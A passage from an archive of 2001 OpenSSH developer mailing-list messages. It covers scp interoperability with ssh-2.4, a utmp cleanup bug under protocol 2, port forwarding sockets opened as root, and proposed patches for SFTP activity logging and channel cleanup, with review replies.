(J.S.Peatfield at damtp.cam.ac.uk) Date: Wed, 20 Jun 2001 05:56:21 +0100 (BST) Subject: openssh-2.9p1 scp to ssh-2.4 fails Message-ID: <200106200456.FAA10899.declaim.amtp.cam.ac.uk@damtp.cam.ac.uk> Am I missing something obvious or does the scp in openssh not interoperate with the scp in ssh-2.4? I don't have any ssh-2.4 systems but a user here trying to fetch a file from a site which uses it (and doesn't have scp1 gets): scp -o 'protocol 2' -o 'loglevel debug3' -v herrada at eurus2.us.es:tf19.dat From J.S.Peatfield at damtp.cam.ac.uk Wed Jun 20 15:09:33 2001 From: J.S.Peatfield at damtp.cam.ac.uk (J.S.Peatfield at damtp.cam.ac.uk) Date: Wed, 20 Jun 2001 06:09:33 +0100 (BST) Subject: openssh-2.9p1 scp to ssh-2.4 fails Message-ID: <200106200509.GAA21071.declaim.amtp.cam.ac.uk@damtp.cam.ac.uk> Damn finger trouble... (must learn to cut/paste...) Am I missing something obvious or does the scp in openssh not interoperate with the scp in ssh-2.4? I don't have any ssh-2.4 systems but a user here trying to fetch a file from a site which uses it (and doesn't have scp1 gets): $ scp -o 'protocol 2' -v foobar at somesite.com:tf19.dat . Executing: program /usr/bin/ssh host somesite.com, user foobar, command scp -v -f tf19.dat foobar at somesite.com's password: scp: warning: Executing scp1 compatibility. scp: FATAL: Executing ssh1 in compatibility mode failed (Check that scp1 is in your PATH). I assume that the scp warning is comming from the far end. Turning up debugging shows that ssh protocol 2 is correctly being used, but for some reason the remote scp tries to run scp1 (which isn't there). Does ssh-2.4 use a different form of scp to that used by ssh1 and openssh? Is there an obvious fix (other than trying to get the remote site to update to openssh)? Is the scp protocol used in ssh-2.4 documented? Could we add support for it in openssh? -- Jon From mouring at etoh.eviladmin.org Wed Jun 20 15:06:11 2001 From: mouring at etoh.eviladmin.org (mouring at etoh.eviladmin.org) Date: Wed, 20 Jun 2001 00:06:11 -0500 (CDT) Subject: openssh-2.9p1 scp to ssh-2.4 fails In-Reply-To: <200106200509.GAA21071.declaim.amtp.cam.ac.uk@damtp.cam.ac.uk> Message-ID: He must use sftp. OpenSSH scp does not support sftp protocol, and SSH Corp's v2 server ONLY implements sftp not traditional rcp-like scp. - Ben On Wed, 20 Jun 2001 J.S.Peatfield at damtp.cam.ac.uk wrote: > Damn finger trouble... (must learn to cut/paste...) > > Am I missing something obvious or does the scp in openssh not > interoperate with the scp in ssh-2.4? I don't have any ssh-2.4 > systems but a user here trying to fetch a file from a site which uses > it (and doesn't have scp1 gets): > > $ scp -o 'protocol 2' -v foobar at somesite.com:tf19.dat . > Executing: program /usr/bin/ssh host somesite.com, user foobar, command scp -v -f tf19.dat > foobar at somesite.com's password: > scp: warning: Executing scp1 compatibility. > scp: FATAL: Executing ssh1 in compatibility mode failed (Check that scp1 > is in your PATH). > > I assume that the scp warning is comming from the far end. Turning up > debugging shows that ssh protocol 2 is correctly being used, but for > some reason the remote scp tries to run scp1 (which isn't there). > Does ssh-2.4 use a different form of scp to that used by ssh1 and > openssh? > > Is there an obvious fix (other than trying to get the remote site to > update to openssh)? > > Is the scp protocol used in ssh-2.4 documented? Could we add support > for it in openssh? > > -- Jon > From J.S.Peatfield at damtp.cam.ac.uk Wed Jun 20 15:51:06 2001 From: J.S.Peatfield at damtp.cam.ac.uk (J.S.Peatfield at damtp.cam.ac.uk) Date: Wed, 20 Jun 2001 06:51:06 +0100 Subject: openssh-2.9p1 scp to ssh-2.4 fails Message-ID: <200106200551.GAA13693.marilyn.amtp.cam.ac.uk@damtp.cam.ac.uk> Thanks, I've asked him to try sftp (I wasn't sure if that would work or not), since I don't have a login on a system runnign ssh-2.4 I can't test it myself... From Lutz.Jaenicke at aet.TU-Cottbus.DE Wed Jun 20 18:20:51 2001 From: Lutz.Jaenicke at aet.TU-Cottbus.DE (Lutz Jaenicke) Date: Wed, 20 Jun 2001 10:20:51 +0200 Subject: [Lutz.Jaenicke@aet.TU-Cottbus.DE: 2.9p1: HP-UX 10.20 utmp/wtmp handling broken?] Message-ID: <20010620102051.A1595@ws01.aet.tu-cottbus.de> Hi! I am resending the following message about problems with utmp handling. * In the meantime I had some request in private mail from people asking whether I have new information. * The problem is still persistant in 2.9p2. * My own new investigations show, that the problem only appears with protocol 2, not with protocol 1, I therefore only started to note it when protocol 2 became the default as of OpenSSH 2.9. - To reproduce: build a connection with protocol 1/2 and then kill the client with -TERM. For protocol 1, the entry in utmp on the server will be removed, for protocol 2 it will not be removed. >From sshd -d I see, that session_pty_cleanup() is not being called. As far as I understood the code in session.c:session_pty_req() /* * Add a cleanup function to clear the utmp entry and record logout * time in case we call fatal() (e.g., the connection gets closed). */ fatal_add_cleanup(session_pty_cleanup, (void *)s); should make sure, that the utmp entry is cleared, but it obviously doesn't work as I expected from that statement. Best regards, Lutz ----- Forwarded message from Lutz Jaenicke ----- Delivered-To: openssh-unix-dev-list-93873 at shitei.mindrot.org Date: Thu, 10 May 2001 10:11:38 +0200 From: Lutz Jaenicke To: openssh-unix-dev at mindrot.org Subject: 2.9p1: HP-UX 10.20 utmp/wtmp handling broken? Mail-Followup-To: openssh-unix-dev at mindrot.org User-Agent: Mutt/1.2.5i Organization: BTU Cottbus, Allgemeine Elektrotechnik Precedence: bulk Hi! I have updated to OpenSSH 2.9p1 on HP-UX 10.20. Since this update, I seem to have problems with utmp/wtmp handling, in that entries are not removed as expected. ws01 36: w 10:06am up 76 days, 12:52, 12 users, load average: 0.17, 0.25, 0.20 User tty login@ idle JCPU PCPU what ... root pts/8 5:28pm159:41 - ... ws01 37: ps -ef | grep pts/8 (nothing) ws01 39: lsof /dev/pts/8 (nothing) >From my observations this seems to happen, when slogin is not finished with "exit", but the ssh-client is killed (e.g. because it was in a terminal window and I log off the window manager). Can anybody verify this behaviour? (Fixes?) I don't remember having seen this with 2.5.2p2... Best regards, Lutz -- Lutz Jaenicke Lutz.Jaenicke at aet.TU-Cottbus.DE BTU Cottbus http://www.aet.TU-Cottbus.DE/personen/jaenicke/ Lehrstuhl Allgemeine Elektrotechnik Tel. +49 355 69-4129 Universitaetsplatz 3-4, D-03044 Cottbus Fax. +49 355 69-4153 ----- End forwarded message ----- -- Lutz Jaenicke Lutz.Jaenicke at aet.TU-Cottbus.DE BTU Cottbus http://www.aet.TU-Cottbus.DE/personen/jaenicke/ Lehrstuhl Allgemeine Elektrotechnik Tel. +49 355 69-4129 Universitaetsplatz 3-4, D-03044 Cottbus Fax. +49 355 69-4153 From Jarno.Huuskonen at uku.fi Wed Jun 20 20:32:41 2001 From: Jarno.Huuskonen at uku.fi (Jarno Huuskonen) Date: Wed, 20 Jun 2001 13:32:41 +0300 Subject: openssh and port forwarding as root Message-ID: <20010620133241.A97346@messi.uku.fi> Hi, Openssh sshd opens the socket that forwards users requested port forwards as root, so the connection seems to come from root. Is it enough to open the socket as normal user so the connection would appear to come from that user ? (On Linux this seems to work, but what about other OS's ?) I tested this briefly by wrapping the channel_connect_to(target,target_port); (in serverloop.c:server_request_direct_tcpip) with temporarily_use_uid and restore_uid calls and it seems to work (I used hardcoded values for temporarily_use_uid). Is it possible to acquire the username/uid/gid info in server_request_direct_tcpip (and where the socket is opened with protocol 1) to add temporarily_use_uid / restore_uid calls ? -Jarno -- Jarno Huuskonen - System Administrator | Jarno.Huuskonen at uku.fi University of Kuopio - Computer Center | Work: +358 17 162822 PO BOX 1627, 70211 Kuopio, Finland | Mobile: +358 40 5388169 From mouring at etoh.eviladmin.org Wed Jun 20 22:34:12 2001 From: mouring at etoh.eviladmin.org (mouring at etoh.eviladmin.org) Date: Wed, 20 Jun 2001 07:34:12 -0500 (CDT) Subject: [Lutz.Jaenicke@aet.TU-Cottbus.DE: 2.9p1: HP-UX 10.20 utmp/wtmp handling broken?] In-Reply-To: <20010620102051.A1595@ws01.aet.tu-cottbus.de> Message-ID: At this point I can only verify that it's true for OpenBSD, but it is not true for Linux. I have a sneeking feeling that if I were to try it under Solaris it would mimic Linux (I'll try it when I get to work). My only reason for this belief is I think PAM may actually handle utmp/wtmp clean ups if the application does not. - Ben On Wed, 20 Jun 2001, Lutz Jaenicke wrote: > Hi! > > I am resending the following message about problems with utmp handling. > * In the meantime I had some request in private mail from people asking > whether I have new information. > * The problem is still persistant in 2.9p2. > * My own new investigations show, that the problem only appears with > protocol 2, not with protocol 1, I therefore only started to note it > when protocol 2 became the default as of OpenSSH 2.9. > - To reproduce: build a connection with protocol 1/2 and then kill the client > with -TERM. For protocol 1, the entry in utmp on the server will be > removed, for protocol 2 it will not be removed. > > >From sshd -d I see, that session_pty_cleanup() is not being called. > As far as I understood the code in session.c:session_pty_req() > /* > * Add a cleanup function to clear the utmp entry and record logout > * time in case we call fatal() (e.g., the connection gets closed). > */ > fatal_add_cleanup(session_pty_cleanup, (void *)s); > should make sure, that the utmp entry is cleared, but it obviously > doesn't work as I expected from that statement. > > Best regards, > Lutz > > ----- Forwarded message from Lutz Jaenicke ----- > > Delivered-To: openssh-unix-dev-list-93873 at shitei.mindrot.org > Date: Thu, 10 May 2001 10:11:38 +0200 > From: Lutz Jaenicke > To: openssh-unix-dev at mindrot.org > Subject: 2.9p1: HP-UX 10.20 utmp/wtmp handling broken? > Mail-Followup-To: openssh-unix-dev at mindrot.org > User-Agent: Mutt/1.2.5i > Organization: BTU Cottbus, Allgemeine Elektrotechnik > Precedence: bulk > > Hi! > > I have updated to OpenSSH 2.9p1 on HP-UX 10.20. > Since this update, I seem to have problems with utmp/wtmp handling, > in that entries are not removed as expected. > ws01 36: w > 10:06am up 76 days, 12:52, 12 users, load average: 0.17, 0.25, 0.20 > User tty login@ idle JCPU PCPU what > ... > root pts/8 5:28pm159:41 - > ... > ws01 37: ps -ef | grep pts/8 > (nothing) > ws01 39: lsof /dev/pts/8 > (nothing) > > >From my observations this seems to happen, when slogin is not finished with > "exit", but the ssh-client is killed (e.g. because it was in a terminal window > and I log off the window manager). > > Can anybody verify this behaviour? (Fixes?) I don't remember having seen > this with 2.5.2p2... > > Best regards, > Lutz > -- > Lutz Jaenicke Lutz.Jaenicke at aet.TU-Cottbus.DE > BTU Cottbus http://www.aet.TU-Cottbus.DE/personen/jaenicke/ > Lehrstuhl Allgemeine Elektrotechnik Tel. +49 355 69-4129 > Universitaetsplatz 3-4, D-03044 Cottbus Fax. +49 355 69-4153 > > ----- End forwarded message ----- > > -- > Lutz Jaenicke Lutz.Jaenicke at aet.TU-Cottbus.DE > BTU Cottbus http://www.aet.TU-Cottbus.DE/personen/jaenicke/ > Lehrstuhl Allgemeine Elektrotechnik Tel. +49 355 69-4129 > Universitaetsplatz 3-4, D-03044 Cottbus Fax. +49 355 69-4153 > From jason at dour.org Wed Jun 20 23:12:08 2001 From: jason at dour.org (Jason A . Dour) Date: Wed, 20 Jun 2001 09:12:08 -0400 Subject: SFTP Logging Redux. Message-ID: <20010620091208.A18950@dour.org> Sorry to repost, but I finally have the code on a machine that has diff -u, and I've updated it for 2.9p2. Attached is the unified diff to add logging of SFTP activity to auth.info. If there is a more proper way to contrib patches, please let me know. Cheers, Jason # "Jason A. Dour" http://dour.org/ # Founder / Executive Producer - PJ Harvey Online - http://pjh.org/ -------------- next part -------------- --- sftp-server.c.orig Tue Jun 19 16:32:45 2001 +++ sftp-server.c Wed Jun 20 08:54:03 2001 @@ -52,8 +52,14 @@ /* Version of client */ int version; -/* portable attibutes, etc. */ +/* User information. */ +#define CUNAME cuname ? cuname : "UNKNOWN" +struct passwd *upw; +uid_t cuid; +pid_t ppid; +char *cuname; +/* portable attibutes, etc. */ typedef struct Stat Stat; struct Stat { @@ -115,6 +121,28 @@ return flags; } +void +sflags_from_portable(char *psflags, int pflags) +{ + if (pflags & SSH2_FXF_READ) + *psflags = 'r'; + psflags++; + if (pflags & SSH2_FXF_WRITE) + *psflags = 'w'; + psflags++; + if (pflags & SSH2_FXF_APPEND) + *psflags = 'a'; + psflags++; + if (pflags & SSH2_FXF_CREAT) + *psflags = 'c'; + psflags++; + if (pflags & SSH2_FXF_TRUNC) + *psflags = 't'; + psflags++; + if (pflags & SSH2_FXF_EXCL) + *psflags = 'e'; +} + Attrib * get_attrib(void) { @@ -370,6 +398,7 @@ version = buffer_get_int(&iqueue); TRACE("client version %d", version); + log("(%d/%d/%s) Client version %d", ppid, cuid, CUNAME, version); buffer_init(&msg); buffer_put_char(&msg, SSH2_FXP_VERSION); buffer_put_int(&msg, SSH2_FILEXFER_VERSION); @@ -382,7 +411,7 @@ { u_int32_t id, pflags; Attrib *a; - char *name; + char *name, sflags[7] = "------"; int handle, fd, flags, mode, status = SSH2_FX_FAILURE; id = get_int(); @@ -390,8 +419,10 @@ pflags = get_int(); /* portable flags */ a = get_attrib(); flags = flags_from_portable(pflags); + sflags_from_portable(&sflags[0], pflags); mode = (a->flags & SSH2_FILEXFER_ATTR_PERMISSIONS) ? a->perm : 0666; TRACE("open id %d name %s flags %d mode 0%o", id, name, pflags, mode); + log("(%d/%d/%s) File/Dir opened: %s (%s,%04o)", ppid, cuid, CUNAME, name, sflags, mode); fd = open(name, flags, mode); if (fd < 0) { status = errno_to_portable(errno); @@ -589,6 +620,7 @@ name = get_string(NULL); a = get_attrib(); TRACE("setstat id %d name %s", id, name); + log("(%d/%d/%s) Permissions altered: %s (%04o).", ppid, cuid, CUNAME, name, a->perm & 0777); if (a->flags & SSH2_FILEXFER_ATTR_PERMISSIONS) { ret = chmod(name, a->perm & 0777); if (ret == -1) @@ -623,6 +655,7 @@ TRACE("fsetstat id %d handle %d", id, handle); fd = handle_to_fd(handle); name = handle_to_name(handle); + log("(%d/%d/%s) Permissions altered: %s (%04o).", ppid, cuid, CUNAME, name, a->perm & 0777); if (fd < 0 || name == NULL) { status = SSH2_FX_FAILURE; } else { @@ -790,6 +823,7 @@ id = get_int(); name = get_string(NULL); TRACE("remove id %d name %s", id, name); + log("(%d/%d/%s) File deleted: %s", ppid, cuid, CUNAME, name); ret = unlink(name); status = (ret == -1) ? errno_to_portable(errno) : SSH2_FX_OK; send_status(id, status); @@ -810,6 +844,7 @@ mode = (a->flags & SSH2_FILEXFER_ATTR_PERMISSIONS) ? a->perm & 0777 : 0777; TRACE("mkdir id %d name %s mode 0%o", id, name, mode); + log("(%d/%d/%s) Directory created: %s", ppid, cuid, CUNAME, name); ret = mkdir(name, mode); status = (ret == -1) ? errno_to_portable(errno) : SSH2_FX_OK; send_status(id, status); @@ -826,6 +861,7 @@ id = get_int(); name = get_string(NULL); TRACE("rmdir id %d name %s", id, name); + log("(%d/%d/%s) Directory deleted: %s", ppid, cuid, CUNAME, name); ret = rmdir(name); status = (ret == -1) ? errno_to_portable(errno) : SSH2_FX_OK; send_status(id, status); @@ -869,6 +905,7 @@ oldpath = get_string(NULL); newpath = get_string(NULL); TRACE("rename id %d old %s new %s", id, oldpath, newpath); + log("(%d/%d/%s) File/Dir renamed: %s -> %s", ppid, cuid, CUNAME, oldpath, newpath); /* fail if 'newpath' exists */ if (stat(newpath, &st) == -1) { ret = rename(oldpath, newpath); @@ -914,6 +951,7 @@ oldpath = get_string(NULL); newpath = get_string(NULL); TRACE("symlink id %d old %s new %s", id, oldpath, newpath); + log("(%d/%d/%s) Symbolic link created: %s -> %s", ppid, cuid, CUNAME, oldpath, newpath); /* fail if 'newpath' exists */ if (stat(newpath, &st) == -1) { ret = symlink(oldpath, newpath); @@ -951,6 +989,7 @@ msg_len = GET_32BIT(cp); if (msg_len > 256 * 1024) { error("bad message "); + log("(%d/%d/%s) SFTP session closing (%s).", ppid, cuid, CUNAME, "Bad Message"); exit(11); } if (buffer_len(&iqueue) < msg_len + 4) @@ -1036,10 +1075,27 @@ __progname = get_progname(av[0]); handle_init(); + /* Initialize the username of the user running the process. */ + cuid = getuid(); + if ((upw = getpwuid(cuid)) == NULL) { + cuname = NULL; + } else { + cuname = upw->pw_name; + } + + /* Initialize the parent process ID. */ + ppid = getppid(); + + /* Initialize the logfile, loglevel dependent on DEBUG compile-time setting. */ #ifdef DEBUG_SFTP_SERVER log_init("sftp-server", SYSLOG_LEVEL_DEBUG1, SYSLOG_FACILITY_AUTH, 0); +#else + log_init("sftp-server", SYSLOG_LEVEL_INFO, SYSLOG_FACILITY_AUTH, 0); #endif + /* Log session start. */ + log("(%d/%d/%s) SFTP session started.", ppid, cuid, CUNAME); + in = dup(STDIN_FILENO); out = dup(STDOUT_FILENO); @@ -1073,6 +1129,7 @@ if (select(max+1, rset, wset, NULL, NULL) < 0) { if (errno == EINTR) continue; + log("(%d/%d/%s) SFTP session closing (%s).", ppid, cuid, CUNAME, "Select Error"); exit(2); } @@ -1082,9 +1139,11 @@ len = read(in, buf, sizeof buf); if (len == 0) { debug("read eof"); + log("(%d/%d/%s) SFTP session closing (%s).", ppid, cuid, CUNAME, "EOF"); exit(0); } else if (len < 0) { error("read error"); + log("(%d/%d/%s) SFTP session closing (%s).", ppid, cuid, CUNAME, "Read Error"); exit(1); } else { buffer_append(&iqueue, buf, len); @@ -1095,6 +1154,7 @@ len = write(out, buffer_ptr(&oqueue), olen); if (len < 0) { error("write error"); + log("(%d/%d/%s) SFTP session closing (%s).", ppid, cuid, CUNAME, "Write Error"); exit(1); } else { buffer_consume(&oqueue, len); From markus.friedl at informatik.uni-erlangen.de Wed Jun 20 23:19:08 2001 From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Wed, 20 Jun 2001 15:19:08 +0200 Subject: openssh and port forwarding as root In-Reply-To: <20010620133241.A97346@messi.uku.fi>; from Jarno.Huuskonen@uku.fi on Wed, Jun 20, 2001 at 01:32:41PM +0300 References: <20010620133241.A97346@messi.uku.fi> Message-ID: <20010620151908.A262@folly> i think it was decided that identd is not worth the trouble of trying to acheive this in a portable way. On Wed, Jun 20, 2001 at 01:32:41PM +0300, Jarno Huuskonen wrote: > Openssh sshd opens the socket that forwards users requested port > forwards as root, so the connection seems to come from root. Is it > enough to open the socket as normal user so the connection would appear > to come from that user ? (On Linux this seems to work, but what about > other OS's ?) From Jarno.Huuskonen at uku.fi Wed Jun 20 23:43:15 2001 From: Jarno.Huuskonen at uku.fi (Jarno Huuskonen) Date: Wed, 20 Jun 2001 16:43:15 +0300 Subject: openssh and port forwarding as root In-Reply-To: <20010620151908.A262@folly>; from markus.friedl@informatik.uni-erlangen.de on Wed, Jun 20, 2001 at 03:19:08PM +0200 References: <20010620133241.A97346@messi.uku.fi> <20010620151908.A262@folly> Message-ID: <20010620164315.A24954@messi.uku.fi> On Wed, Jun 20, Markus Friedl wrote: > i think it was decided that identd is not worth the trouble > of trying to acheive this in a portable way. Probably the only reason for implementing this might be that inside your own org. identd could give some (weak) auditing/log information. Hmm, how portable is the open socket as user -> identd shows user owns the connection ? > On Wed, Jun 20, 2001 at 01:32:41PM +0300, Jarno Huuskonen wrote: > > Openssh sshd opens the socket that forwards users requested port > > forwards as root, so the connection seems to come from root. Is it > > enough to open the socket as normal user so the connection would appear > > to come from that user ? (On Linux this seems to work, but what about > > other OS's ?) -Jarno -- Jarno Huuskonen - System Administrator | Jarno.Huuskonen at uku.fi University of Kuopio - Computer Center | Work: +358 17 162822 PO BOX 1627, 70211 Kuopio, Finland | Mobile: +358 40 5388169 From Markus.Friedl at informatik.uni-erlangen.de Wed Jun 20 23:49:26 2001 From: Markus.Friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Wed, 20 Jun 2001 15:49:26 +0200 Subject: [Lutz.Jaenicke@aet.TU-Cottbus.DE: 2.9p1: HP-UX 10.20 utmp/wtmp handling broken?] In-Reply-To: <20010620102051.A1595@ws01.aet.tu-cottbus.de>; from Lutz.Jaenicke@aet.TU-Cottbus.DE on Wed, Jun 20, 2001 at 10:20:51AM +0200 References: <20010620102051.A1595@ws01.aet.tu-cottbus.de> Message-ID: <20010620154926.A8991@faui02.informatik.uni-erlangen.de> On Wed, Jun 20, 2001 at 10:20:51AM +0200, Lutz Jaenicke wrote: > I am resending the following message about problems with utmp handling. thanks. your original message was somehow dropped due to problems with the signal-to-noise ratio. you can try this patch (against -current). the patch does a little bit more, but all you need is this: + channel_free_all(); + signal(SIGCHLD, SIG_DFL); while ((pid = waitpid(-1, &status, WNOHANG)) > 0) session_close_by_pid(pid, status); - channel_stop_listening(); in serverloop.c and an implementation for channel_free_all(). (some interfaces in channel.c have been changed since 2.9). Index: channels.c =================================================================== RCS file: /home/markus/cvs/ssh/channels.c,v retrieving revision 1.125 diff -u -r1.125 channels.c --- channels.c 2001/06/07 20:23:04 1.125 +++ channels.c 2001/06/20 13:25:23 @@ -223,11 +223,7 @@ channels = xmalloc(channels_alloc * sizeof(Channel *)); for (i = 0; i < channels_alloc; i++) channels[i] = NULL; - /* - * Kludge: arrange a call to channel_stop_listening if we - * terminate with fatal(). - */ - fatal_add_cleanup((void (*) (void *)) channel_stop_listening, NULL); + fatal_add_cleanup((void (*) (void *)) channel_free_all, NULL); } /* Try to find a free slot where to put the new channel. */ for (found = -1, i = 0; i < channels_alloc; i++) @@ -334,38 +330,15 @@ xfree(c); } - -/* - * Stops listening for channels, and removes any unix domain sockets that we - * might have. - */ - void -channel_stop_listening() +channel_free_all(void) { int i; - Channel *c; - for (i = 0; i < channels_alloc; i++) { - c = channels[i]; - if (c != NULL) { - switch (c->type) { - case SSH_CHANNEL_AUTH_SOCKET: - close(c->sock); - /* auth_sock_cleanup_proc deletes the socket */ - channel_free(c); - break; - case SSH_CHANNEL_PORT_LISTENER: - case SSH_CHANNEL_RPORT_LISTENER: - case SSH_CHANNEL_X11_LISTENER: - close(c->sock); - channel_free(c); - break; - default: - break; - } - } - } + debug("closing all channels"); + for (i = 0; i < channels_alloc; i++) + if (channels[i] != NULL) + channel_free(channels[i]); } /* Index: channels.h =================================================================== RCS file: /home/markus/cvs/ssh/channels.h,v retrieving revision 1.38 diff -u -r1.38 channels.h --- channels.h 2001/06/16 08:50:39 1.38 +++ channels.h 2001/06/20 13:25:24 @@ -150,6 +150,7 @@ channel_set_fds(int id, int rfd, int wfd, int efd, int extusage, int nonblock); void channel_free(Channel *c); +void channel_free_all(void); void channel_send_open(int id); void channel_request(int id, char *service, int wantconfirm); @@ -182,8 +183,8 @@ void channel_output_poll(void); int channel_not_very_much_buffered_data(void); -void channel_stop_listening(void); void channel_close_all(void); +void channel_free_all(void); int channel_still_open(void); char *channel_open_message(void); int channel_find_open(void); Index: clientloop.c =================================================================== RCS file: /home/markus/cvs/ssh/clientloop.c,v retrieving revision 1.75 diff -u -r1.75 clientloop.c --- clientloop.c 2001/06/04 23:07:20 1.75 +++ clientloop.c 2001/06/20 13:28:17 @@ -546,7 +546,7 @@ leave_raw_mode(); /* Stop listening for new connections. */ - channel_stop_listening(); + channel_close_all(); /* proto1 only XXXX */ printf("%c& [backgrounded]\n", escape_char); @@ -926,8 +926,7 @@ if (have_pty) signal(SIGWINCH, SIG_DFL); - /* Stop listening for connections. */ - channel_stop_listening(); + channel_free_all(); if (have_pty) leave_raw_mode(); Index: packet.c =================================================================== RCS file: /home/markus/cvs/ssh/packet.c,v retrieving revision 1.66 diff -u -r1.66 packet.c --- packet.c 2001/06/12 16:11:26 1.66 +++ packet.c 2001/06/20 13:25:24 @@ -1085,7 +1085,7 @@ packet_write_wait(); /* Stop listening for connections. */ - channel_stop_listening(); + channel_close_all(); /* Close the connection. */ packet_close(); Index: serverloop.c =================================================================== RCS file: /home/markus/cvs/ssh/serverloop.c,v retrieving revision 1.68 diff -u -r1.68 serverloop.c --- serverloop.c 2001/06/04 23:07:20 1.68 +++ serverloop.c 2001/06/20 13:25:24 @@ -608,8 +608,7 @@ close(fdin); fdin = -1; - /* Stop listening for channels; this removes unix domain sockets. */ - channel_stop_listening(); + channel_free_all(); /* We no longer want our SIGCHLD handler to be called. */ signal(SIGCHLD, SIG_DFL); @@ -700,10 +699,11 @@ if (writeset) xfree(writeset); + channel_free_all(); + signal(SIGCHLD, SIG_DFL); while ((pid = waitpid(-1, &status, WNOHANG)) > 0) session_close_by_pid(pid, status); - channel_stop_listening(); } void From bds at jhb.ucs.co.za Thu Jun 21 00:05:51 2001 From: bds at jhb.ucs.co.za (Berend De Schouwer) Date: 20 Jun 2001 16:05:51 +0200 Subject: Old pam systems Message-ID: <993045951.26467.1.camel@bds.ucs.co.za> Hi, I've recently had the pleasure of compiling OpenSSH for an older Linux 2.0/libc 5 machine. It comes with an older version of PAM, and the configure script rightfully triggers HAVE_OLD_PAM. I've found that some PAM_*_CRED #defines have changed, and this prevents auth-pam.c from compiling, so I made the obvious fix. The attached patch is against OpenSSH 2.9p2. Things to consider: - Is this generic? Do all old PAM installations behave the same way? - Is it better to patch defines.h? Or another place? - Is it better to #ifndef AUTH_*_CRED then #define AUTH_CRED_*? Kind regards, Berend -- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Berend De Schouwer, +27-11-712-1435, UCS -------------- next part -------------- An embedded and charset-unspecified text was scrubbed... Name: openssh-old-pam.patch Url: http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20010620/101bf3ae/attachment.ksh From Lutz.Jaenicke at aet.TU-Cottbus.DE Thu Jun 21 02:08:45 2001 From: Lutz.Jaenicke at aet.TU-Cottbus.DE (Lutz Jaenicke) Date: Wed, 20 Jun 2001 18:08:45 +0200 Subject: [Lutz.Jaenicke@aet.TU-Cottbus.DE: 2.9p1: HP-UX 10.20 utmp/wtmp handling broken?] In-Reply-To: <20010620154926.A8991@faui02.informatik.uni-erlangen.de>; from Markus.Friedl@informatik.uni-erlangen.de on Wed, Jun 20, 2001 at 03:49:26PM +0200 References: <20010620102051.A1595@ws01.aet.tu-cottbus.de> <20010620154926.A8991@faui02.informatik.uni-erlangen.de> Message-ID: <20010620180845.A18250@ws01.aet.tu-cottbus.de> On Wed, Jun 20, 2001 at 03:49:26PM +0200, Markus Friedl wrote: > you can try this patch (against -current). > > the patch does a little bit more, but all you > need is this: > + channel_free_all(); > + > signal(SIGCHLD, SIG_DFL); > while ((pid = waitpid(-1, &status, WNOHANG)) > 0) > session_close_by_pid(pid, status); > - channel_stop_listening(); > > in serverloop.c and an implementation for channel_free_all(). It does not work. The effect is still the same. A sshd -d yields: Connection closed by remote host. debug1: closing all channels debug1: channel_free: channel 0: server-session, nchannels 1 debug1: channel_free: channel 0: dettaching channel user debug1: session_by_channel: session 0 channel 0 debug1: session_close_by_channel: channel 0 kill 18299 Closing connection to 141.43.132.151 Following the code in session.c, session_close_by_channel with s->pid != 0 will "notify child, delay session cleanup". However, session_close() is never called (it would be seen due to debug("session_close: session %d pid %d", s->self, s->pid)) and therefore it seems that session_pty_cleanup(s) (finally calling the record_logout() function) is never called. Best regards, Lutz -- Lutz Jaenicke Lutz.Jaenicke at aet.TU-Cottbus.DE BTU Cottbus http://www.aet.TU-Cottbus.DE/personen/jaenicke/ Lehrstuhl Allgemeine Elektrotechnik Tel. +49 355 69-4129 Universitaetsplatz 3-4, D-03044 Cottbus Fax. +49 355 69-4153 From rjmooney at aboveground.cx Thu Jun 21 06:05:52 2001 From: rjmooney at aboveground.cx (Robert Mooney) Date: Wed, 20 Jun 2001 16:05:52 -0400 Subject: SFTP Logging Redux. In-Reply-To: <20010620091208.A18950@dour.org> Message-ID: It looks like you're logging the requested action, not the result. For instance: log("(%d/%d/%s) File/Dir opened: %s (%s,%04o)"...); fd = open(name, flags, mode); Unless I'm missing something about the functionality of log(), I would expect it to come after the open(), and include information as to whether or not the action actually succeeded. Also, a switch to a) turn on logging, and b) set the verbosity of the logging would be cool. In general, I think it's easier for a developer to turn his back on your patch if it's adding functionality without requiring the user request it explicitly. Nice idea though, I would like to see something similar committed. - Rob : -----Original Message----- : From: owner-openssh-unix-dev at mindrot.org : [mailto:owner-openssh-unix-dev at mindrot.org]On Behalf Of Jason A . Dour : Sent: Wednesday, June 20, 2001 9:12 AM : To: openssh-unix-dev at mindrot.org : Subject: SFTP Logging Redux. : : : Sorry to repost, but I finally have the code on a machine that has : diff -u, and I've updated it for 2.9p2. Attached is the unified : diff to add logging of SFTP activity to auth.info. : : If there is a more proper way to contrib patches, please let me : know. : : : Cheers, : Jason : # "Jason A. Dour" http://dour.org/ : # Founder / Executive Producer - PJ Harvey Online - http://pjh.org/ : From mouring at etoh.eviladmin.org Thu Jun 21 06:12:06 2001 From: mouring at etoh.eviladmin.org (mouring at etoh.eviladmin.org) Date: Wed, 20 Jun 2001 15:12:06 -0500 (CDT) Subject: SFTP Logging Redux. In-Reply-To: Message-ID: Agreed. If we are going to log anything it should be the success/failure of the request.. not so much the request itself. - Ben On Wed, 20 Jun 2001, Robert Mooney wrote: > > It looks like you're logging the requested action, not the result. For > instance: > > log("(%d/%d/%s) File/Dir opened: %s (%s,%04o)"...); > fd = open(name, flags, mode); > > Unless I'm missing something about the functionality of log(), I would > expect it to come after the open(), and include information as to > whether or not the action actually succeeded. > > Also, a switch to a) turn on logging, and b) set the verbosity of the > logging would be cool. > > In general, I think it's easier for a developer to turn his back on > your patch if it's adding functionality without requiring the user > request it explicitly. > > Nice idea though, I would like to see something similar committed. > > - Rob > > : -----Original Message----- > : From: owner-openssh-unix-dev at mindrot.org > : [mailto:owner-openssh-unix-dev at mindrot.org]On Behalf Of Jason A . Dour > : Sent: Wednesday, June 20, 2001 9:12 AM > : To: openssh-unix-dev at mindrot.org > : Subject: SFTP Logging Redux. > : > : > : Sorry to repost, but I finally have the code on a machine that has > : diff -u, and I've updated it for 2.9p2. Attached is the unified > : diff to add logging of SFTP activity to auth.info. > : > : If there is a more proper way to contrib patches, please let me > : know. > : > : > : Cheers, > : Jason > : # "Jason A. Dour" http://dour.org/ > : # Founder / Executive Producer - PJ Harvey Online - http://pjh.org/ > : > From dveeravalli at telica.com Thu Jun 21 06:39:33 2001 From: dveeravalli at telica.com (Deepa Nemmili 